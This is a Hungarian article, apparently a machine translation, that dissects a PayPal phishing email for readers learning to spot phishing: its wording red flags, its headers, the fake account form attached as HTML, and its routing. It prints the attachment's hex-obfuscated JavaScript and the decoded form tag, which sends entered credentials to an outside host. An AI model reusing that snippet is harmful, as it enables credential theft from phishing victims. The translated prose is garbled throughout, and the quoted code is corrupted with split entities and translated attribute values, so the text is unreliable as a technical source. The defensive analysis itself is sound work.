10Sep
A mai világban, ahol mindenki információ van online, az adathalászat az egyik legnépszerűbb és pusztító online támadás, mert mindig meg tudja tisztítani a vírust, de ha bankadatait ellopták, akkor bajban vagy. Itt van egy ilyen támadás megtörése.
Ne gondold, hogy csak a bankadatok fontosak: végül is, ha valaki átveszi a fiókbejegyzését, akkor nem csak az adott fiókban szereplő információkat ismeri fel, de az esélyek ugyanazok a bejelentkezési adatok felhasználhatók különbözőegyéb fiókok.És ha kompromisszák az e-mail fiókját, akkor visszaállíthatja az összes többi jelszót.
Tehát az erős és változó jelszavak megtartása mellett mindig figyelni kell a hamis e-maileket, amelyek az igazi maszkolást jelentik. Miközben a legtöbb adathalász kísérlet amatőr, egyesek meglehetősen meggyőzőek, ezért fontos megérteni, hogyan ismerjék fel őket a felszíni szinten, és hogyan működnek a motorháztető alatt.
A Asiund
vizsgálata A Plain Sight
példája A példapéldányunk, mint a legtöbb adathalász kísérlet, "értesíti" Önt a PayPal-fiókjában végzett tevékenységről, amely normális körülmények között riasztó lehet. Tehát a cselekvésre való felhívás a fiók ellenőrzése / visszaállítása azzal, hogy csaknem minden olyan személyes adatot nyújt be, amelyről gondolhatsz. Ismét ez eléggé formális.
Bár biztosan van kivétel, minden adathalász és átveréses e-mailt piros zászlók töltenek közvetlenül az üzenetben. Még ha a szöveg is meggyőző, általában sok hibát találsz az üzenetek testében, amelyek azt jelzik, hogy az üzenet nem törvényes.
Az üzenetközpont
Első pillantásra ez az egyik legjobb adathalász e-mail, amit láttam. Nincsenek helyesírási vagy nyelvtani hibák, és a szóbeli olvasás az Ön elvárásainak megfelelően olvasható.Vannak azonban még néhány piros zászló is, amelyet egy kicsit közelebbről megvizsgál.
- "Paypal" - A helyes eset a "PayPal"( tőke P).Láthatja, hogy az üzenetben mindkét változatot használják. A vállalatok nagyon szándékosak a brandingjükkel, így kétséges, hogy valami ilyesmi áthaladna a korrigáló folyamaton.
- "allow ActiveX" - Hányszor látta a PayPal méretű legális web alapú vállalkozást egy olyan tulajdonosi összetevővel, amely csak egyetlen böngészőn működik, különösen akkor, ha több böngészőt támogat? Persze, valahol ott van egy cég, de ez egy piros zászló.
- "biztonságosan". - Figyeld meg, hogy ez a szó nem illeszkedik a margóhoz a bekezdés szövegének többi részével. Még akkor is, ha egy kicsit többet nyúlok ki az ablakhoz, nem tér el helyesen.
- "Paypal!" - A felkiáltójel előtt álló tér kellemetlennek tűnik. Csak egy újabb meglepetés, amelyről biztos vagyok benne, hogy nem lenne egy legitim e-mail.
- "PayPal-Számla frissítése Form.pdf.htm" - Miért kapcsolódna a Paypal egy "PDF" -hez, különösen akkor, ha csak egy oldalra mutató linket tudna elhelyezni a webhelyén? Továbbá, miért próbálják elrejteni a HTML-fájlt PDF formátumban? Ez a legnagyobb piros zászló.
Az üzenetfejléc
Ha megnézed az üzenet fejlécét, még néhány piros jelzés jelenik meg:
- A címről a [email protected].
- A címre hiányzik. Nem üresítettem ki, egyszerűen nem része a standard üzenet fejlécnek.Általában egy olyan cég, amely a nevedet személyre szabja az e-mailt.
Az
csatoló Amikor megnyitom a mellékletet, azonnal láthatod, hogy az elrendezés nem helyes, mert hiányzik a stílusadatok. Ismét miért küldi el a PayPal HTML formanyomtatványt, amikor csak egy linket adhatnak hozzá a webhelyükön?
Megjegyzés: a Gmail beépített HTML csatolmánymegtekintőjét használtuk erre a célra, de azt javasoljuk, hogy NEM NYOLTA a csalásoktól származó mellékleteket. Soha. Valaha. Gyakran tartalmaznak olyan kizsákmányolókat, amelyek trojansokat telepítenek a számítógépére, hogy ellopják a fiókadatait.
Egy kicsit többet görgetve láthatjuk, hogy ez az űrlap nem csak a PayPal bejelentkezési adatait, hanem banki és hitelkártya adatait is megkérdezi. Néhány kép törött.
Nyilvánvaló, hogy ez az adathalászkodási kísérlet mindent egy újabb dolog után követ.
A műszaki részletezés
Bár egyértelműnek kell lennie abból a látszatból kiindulva, hogy ez egy adathalászati kísérlet, most megpróbáljuk lebontani az e-mail technikai összetételét és megnézni, mit találhatunk.
Információk az
csatolmányból Az első dolog, hogy megnézzük a csatolt formanyomtatvány HTML forrását, ami az adatokat a hamis webhelyre küldi.
A forrás gyors megtekintésénél az összes hivatkozás érvényben van, mivel a "paypal.com" vagy a "paypalobjects.com" kifejezésre utal, amelyek mindegyike legitim.
Most megnézzük azokat az alapvető oldalinformációkat, amelyeket a Firefox gyűjti össze az oldalon.
Amint látja, a grafikák egy része a legit PayPal domainek helyett a "blessedtobe.com", a "goodhealthpharmacy.com" és a "pic-upload.de" domainekből húzódik.
Információk az e-mail fejlécekről
A továbbiakban megnézzük a nyers email üzenet fejléceket. A Gmail ezt az üzenet Eredeti menüpontján keresztül jeleníti meg.
Az eredeti üzenet fejlécadatainak megtekintésével láthatjuk, hogy ez az üzenet az Outlook Express 6 alkalmazásával készült. Kétlem, hogy a PayPal rendelkezik személyzettel a személyzettel, amely az üzenetek kézzel történő elküldését egy elavult e-mail kliensen keresztül továbbítja.
Most az útválasztási információk megtekintésével láthatjuk mind a küldő, mind a továbbító levelezőszerver IP-címét.
A "Felhasználó" IP-cím az eredeti feladó.Az IP-adatok gyors lekérdezésére láthatjuk, hogy a küldő IP-cím Németországban van.
És amikor megnézzük az átküldő levelező szerver( mail.itak.at) IP-címét látjuk, ez egy Ausztriában működő internetszolgáltató.Kétlem, hogy a PayPal az e-maileket közvetlenül egy osztrák internetszolgáltatón keresztül irányítja, amikor egy hatalmas szervergazdasággal rendelkezik, amely könnyen kezelheti ezt a feladatot.
Hol tart az adatok?
Tehát egyértelműen meghatároztuk, hogy ez egy adathalász e-mail, és összegyűjtött néhány információt arról, hogy honnan származik az üzenet, de mi a helyzet az adatok küldésével?
Ehhez először el kell mentenünk a HTM mellékletet az asztalunkon, és meg kell nyitnunk egy szövegszerkesztőben. Görgetés közben minden úgy tűnik, hogy rendben van, kivéve, ha egy gyanús kereső Javascript blokkhoz jutunk.
A Javascript utolsó blokkjának teljes forrását feloldva a következőket látjuk:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Ha bármikor látsz egy nagyszerű, látszólag véletlenszerű betűket és számokat egy Javascript blokkba ágyazva, akkor általában valami gyanús. A kódot nézve az "x" változó erre a nagy karakterláncra van állítva, majd dekódolva az "y" változóra. Az "y" változó végeredményét a dokumentumba HTML formában írjuk.
Mivel a nagy húr készült 0-9 számok és a betűk af, akkor valószínűleg kódolva van egyszerű ASCII Hex átalakítás:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Megfelelője:
& lt; form name =”fő” id =”fő”method = "hozzászólás" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Nem véletlen, hogy ez érvényes HTML formátumú címkévé alakul, amely nem PayPal-hez, hanem egy gazember-helyhez küldi az eredményeket.
Továbbá, ha megtekinti az űrlap HTML forrását, látni fogod, hogy ez a űrlapcímke nem látható, mert dinamikusan keletkezik a Javascripten keresztül. Ez egy okos módszer arra, hogy elrejtse, mit csinál a HTML, ha valaki egyszerűen megtekinti a létrehozott forrást( mint korábban tettük), szemben azzal, hogy a melléklet közvetlenül a szövegszerkesztőben nyílik meg.
Gyors whois futása a sértő webhelyen, láthatjuk, hogy ez egy olyan domain, amelyet egy népszerű internetes fogadó host, 1and1.
Ami kiemelkedik, a domain egy olvasható nevet használ( ellentétben valami "dfh3sjhskjhw.net"), és a domain regisztrált 4 évig. Emiatt úgy gondolom, hogy ezt a domain-t elfogták és használják zálogként ebben az adathalászati kísérletben.
A cinizmus egy jó védelem
Amikor biztonságban marad az interneten, soha nem fáj a jó cinizmus.
Bár biztos vagyok benne, hogy a piros zászlók több példányban vannak, a fent említettek olyan mutatók, amelyeket csak néhány perc után vettünk észre. Hipotetikus módon, ha az e-mail felületi szintje 100% -os legitim pártját utánozta, akkor a technikai elemzés még mindig felmutatná valódi természetét. Ezért importálható, hogy megvizsgálhassa mindazt, amit tudsz és nem láthatsz.